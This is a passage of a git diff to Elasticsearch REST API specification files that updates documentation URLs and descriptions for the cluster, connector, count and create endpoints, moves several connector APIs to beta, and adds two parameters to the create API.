--git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json index 77aac96571a38..2ddd9c165e93a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_settings.json @@ -1,8 +1,8 @@ { "cluster.put_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-update-settings.html", - "description":"Updates the cluster settings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings", + "description":"Update the cluster settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json index 689d10606b0ef..5e0cf3aaa9754 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.remote_info.json @@ -1,8 +1,8 @@ { "cluster.remote_info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-remote-info.html", - "description":"Returns the information about configured remote clusters." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-remote-info", + "description":"Get remote cluster information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json index 81409fa507200..aa7ee0fe00603 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.reroute.json @@ -1,8 +1,8 @@ { "cluster.reroute":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-reroute.html", - "description":"Allows to manually change the allocation of individual shards in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-reroute", + "description":"Reroute the cluster" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json index faf1aafd1f881..914c1fbdb2669 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.state.json @@ -1,8 +1,8 @@ { "cluster.state":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-state.html", - "description":"Returns a comprehensive information about the state of the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-state", + "description":"Get the cluster state" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json index 23f6ed4ec5b76..21ba100888780 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.stats.json @@ -1,8 +1,8 @@ { "cluster.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-stats.html", - "description":"Returns high-level overview of cluster statistics." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-stats", + "description":"Get cluster statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json index 36535109df8e7..842c2498d9a5c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.check_in.json @@ -1,8 +1,8 @@ { "connector.check_in": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/check-in-connector-api.html", - "description": "Updates the last_seen timestamp in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-check-in", + "description": "Check in a connector" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json index aa5a3dc0a791f..70ffe98ea2f30 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.delete.json @@ -1,10 +1,10 @@ { "connector.delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-connector-api.html", - "description": "Deletes a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-delete", + "description": "Delete a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json index 670bb4267bdfa..5eb3904ce93a2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.get.json @@ -1,10 +1,10 @@ { "connector.get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-connector-api.html", - "description": "Returns the details about a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-get", + "description": "Get a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json index f6d93555b72ed..1c7fa72ee1d63 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.last_sync.json @@ -1,11 +1,11 @@ { "connector.last_sync": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-last-sync-api.html", - "description": "Updates the stats of last sync in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-last-sync", + "description": "Update the connector last sync stats" }, "stability": "experimental", - "visibility": "public", + "visibility": "private", "headers": { "accept": [ "application/json" diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json index b8c73a09704f1..187f9300351b2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.list.json @@ -1,10 +1,10 @@ { "connector.list": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-connector-api.html", - "description": "Lists all connectors." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-list", + "description": "Get all connectors" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json index 365c5353b2f48..46849133e39b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.post.json @@ -1,10 +1,10 @@ { "connector.post": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/create-connector-api.html", - "description": "Creates a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-put", + "description": "Create a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json index dfcda983cfc45..54a629039e38f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.put.json @@ -1,10 +1,10 @@ { "connector.put": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/create-connector-api.html", - "description": "Creates or updates a connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-put", + "description": "Create or update a connector" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json index b93f7ae94d2c4..9c2750b6c736a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_delete.json @@ -2,7 +2,7 @@ "connector.secret_delete": { "documentation": { "url": null, - "description": "Deletes a connector secret." + "description": "Deletes a connector secret" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json index a4d6f34290727..5af3195b67ae0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_get.json @@ -2,7 +2,7 @@ "connector.secret_get": { "documentation": { "url": null, - "description": "Retrieves a secret stored by Connectors." + "description": "Retrieves a secret stored by Connectors" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json index ca61b9165e3b4..1040ac5fc9964 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_post.json @@ -2,7 +2,7 @@ "connector.secret_post": { "documentation": { "url": null, - "description": "Creates a secret for a Connector." + "description": "Creates a secret for a Connector" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json index f99d3f6176f3f..5588ba4c9e2ee 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.secret_put.json @@ -2,7 +2,7 @@ "connector.secret_put": { "documentation": { "url": null, - "description": "Creates or updates a secret for a Connector." + "description": "Creates or updates a secret for a Connector" }, "stability": "experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json index 4f0729a3a11ca..61a4c19c310e0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_cancel.json @@ -1,10 +1,10 @@ { "connector.sync_job_cancel": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/cancel-connector-sync-job-api.html", - "description": "Cancels a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-cancel", + "description": "Cancel a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json index 10a1a40d616eb..a5aac925c5dfc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_check_in.json @@ -1,8 +1,8 @@ { "connector.sync_job_check_in": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/check-in-connector-sync-job-api.html", - "description": "Checks in a connector sync job (refreshes 'last_seen')." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-check-in", + "description": "Check in a connector sync job" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json index f8d090264038a..32e4053110a4c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_claim.json @@ -1,8 +1,8 @@ { "connector.sync_job_claim": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/claim-connector-sync-job-api.html", - "description": "Claims a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-claim", + "description": "Claim a connector sync job" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json index 591cb8f0cc695..11705ff33c978 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_delete.json @@ -1,10 +1,10 @@ { "connector.sync_job_delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-connector-sync-job-api.html", - "description": "Deletes a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-delete", + "description": "Delete a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json index ea5c2a0dd0586..4ca98a5c27788 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_error.json @@ -1,8 +1,8 @@ { "connector.sync_job_error": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/set-connector-sync-job-error-api.html", - "description": "Sets an error for a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-error", + "description": "Set a connector sync job error" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json index 8a46a1eecc6ec..540ff00f0c7a0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_get.json @@ -1,10 +1,10 @@ { "connector.sync_job_get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-connector-sync-job-api.html", - "description": "Returns the details about a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-get", + "description": "Get a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json index 737028ce782f8..c4e958e197811 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json @@ -1,10 +1,10 @@ { "connector.sync_job_list": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-connector-sync-jobs-api.html", - "description": "Lists all connector sync jobs." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-list", + "description": "Get all connector sync jobs" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json index 88069718dbd20..51a750e5f0672 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json @@ -1,10 +1,10 @@ { "connector.sync_job_post": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/create-connector-sync-job-api.html", - "description": "Creates a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-post", + "description": "Create a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json index 744de17a6ad00..dda4001d08faa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json @@ -1,8 +1,8 @@ { "connector.sync_job_update_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/set-connector-sync-job-stats-api.html", - "description": "Updates the stats fields in the connector sync job document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-update-stats", + "description": "Set the connector sync job stats" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json index 343791e7ac11f..a249f9da7aede 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json @@ -1,8 +1,8 @@ { "connector.update_active_filtering": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-filtering-api.html", - "description": "Activates the draft filtering rules if they are in a validated state." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-filtering", + "description": "Activate the connector draft filter" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json index cc989bfec8a8d..547851ff14400 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json @@ -1,10 +1,10 @@ { "connector.update_api_key_id": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-api-key-id-api.html", - "description": "Updates the API key id and/or API key secret id fields in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-api-key-id", + "description": "Update the connector API key ID" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json index 1ececd7ea95f7..187de2ca58c1c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json @@ -1,10 +1,10 @@ { "connector.update_configuration": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-configuration-api.html", - "description": "Updates the connector configuration." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-configuration", + "description": "Update the connector configuration" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json index 150f71ad033ac..4f94a87a00695 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json @@ -1,8 +1,8 @@ { "connector.update_error": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-error-api.html", - "description": "Updates the error field in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-error", + "description": "Update the connector error field" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json index b488e19262c2e..17d89171a3612 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json @@ -1,8 +1,8 @@ { "connector.update_features": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-features-api.html", - "description": "Updates the connector features in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-features", + "description": "Update the connector features" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json index c2a9bf0720746..42ca9d073057f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json @@ -1,10 +1,10 @@ { "connector.update_filtering": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-filtering-api.html", - "description": "Updates the filtering field in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-filtering", + "description": "Update the connector filtering" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json index 99b0a9e6116c1..133b05f735bd0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json @@ -1,8 +1,8 @@ { "connector.update_filtering_validation": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-filtering-api.html", - "description": "Updates the validation info of the draft filtering rules." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-filtering-validation", + "description": "Update the connector draft filtering validation" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json index 97d76f60c0292..274bba95a399f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json @@ -1,10 +1,10 @@ { "connector.update_index_name": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-index-name-api.html", - "description": "Updates the index name of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-index-name", + "description": "Update the connector index name" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json index a7ca1a9730ab9..f9efc96b68bdd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json @@ -1,10 +1,10 @@ { "connector.update_name": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-name-description-api.html", - "description": "Updates the name and/or description fields in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-name", + "description": "Update the connector name and description" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json index 5a13b44e8202d..f99ad5f1087d2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json @@ -1,10 +1,10 @@ { "connector.update_native": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/connector-apis.html", - "description": "Updates the is_native flag of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-native", + "description": "Update the connector is_native flag" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json index b7ab6abcf088d..4a06d4db6953b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json @@ -1,10 +1,10 @@ { "connector.update_pipeline": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-pipeline-api.html", - "description": "Updates the pipeline field in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-pipeline", + "description": "Update the connector pipeline" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json index 98cee5c257b90..91edb0ffdad86 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json @@ -1,10 +1,10 @@ { "connector.update_scheduling": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-scheduling-api.html", - "description": "Updates the scheduling field in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-scheduling", + "description": "Update the connector scheduling" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json index 279d93c684783..b12552d862818 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json @@ -1,10 +1,10 @@ { "connector.update_service_type": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-service-type-api.html", - "description": "Updates the service type of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-service-type", + "description": "Update the connector service type" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json index ea5e506faad89..d55b223bf438e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json @@ -1,8 +1,8 @@ { "connector.update_status": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-status-api.html", - "description": "Updates the status of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-status", + "description": "Update the connector status" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/count.json b/rest-api-spec/src/main/resources/rest-api-spec/api/count.json index 6ebeb572f0481..fad7e2174591d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/count.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/count.json @@ -1,8 +1,8 @@ { "count":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-count.html", - "description":"Returns number of documents matching a query." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-count", + "description":"Count search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/create.json b/rest-api-spec/src/main/resources/rest-api-spec/api/create.json index 65cb0da4753cc..215c756073912 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/create.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/create.json @@ -1,8 +1,8 @@ { "create":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html", - "description":"Creates a new document in the index.\n\nReturns a 409 response when a document with a same ID already exists in the index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create", + "description":"Create a new document in the index" }, "stability":"stable", "visibility":"public", @@ -73,6 +73,14 @@ "include_source_on_error": { "type": "boolean", "description": "True or false if to include the document source in the error message in case of parsing errors. Defaults to true." + }, + "require_alias":{ + "type":"boolean", + "description":"When true, requires destination to be an alias. Default is false" + }, + "require_data_stream":{ + "type":"boolean", + "description":"When true, requires destination to be a data stream (existing or to be created). Default is false" } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json index 8106e80deeaf8..2201aa78cd2b7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json @@ -1,8 +1,8 @@ { "dangling_indices.delete_dangling_index": { "documentation": { - "url": 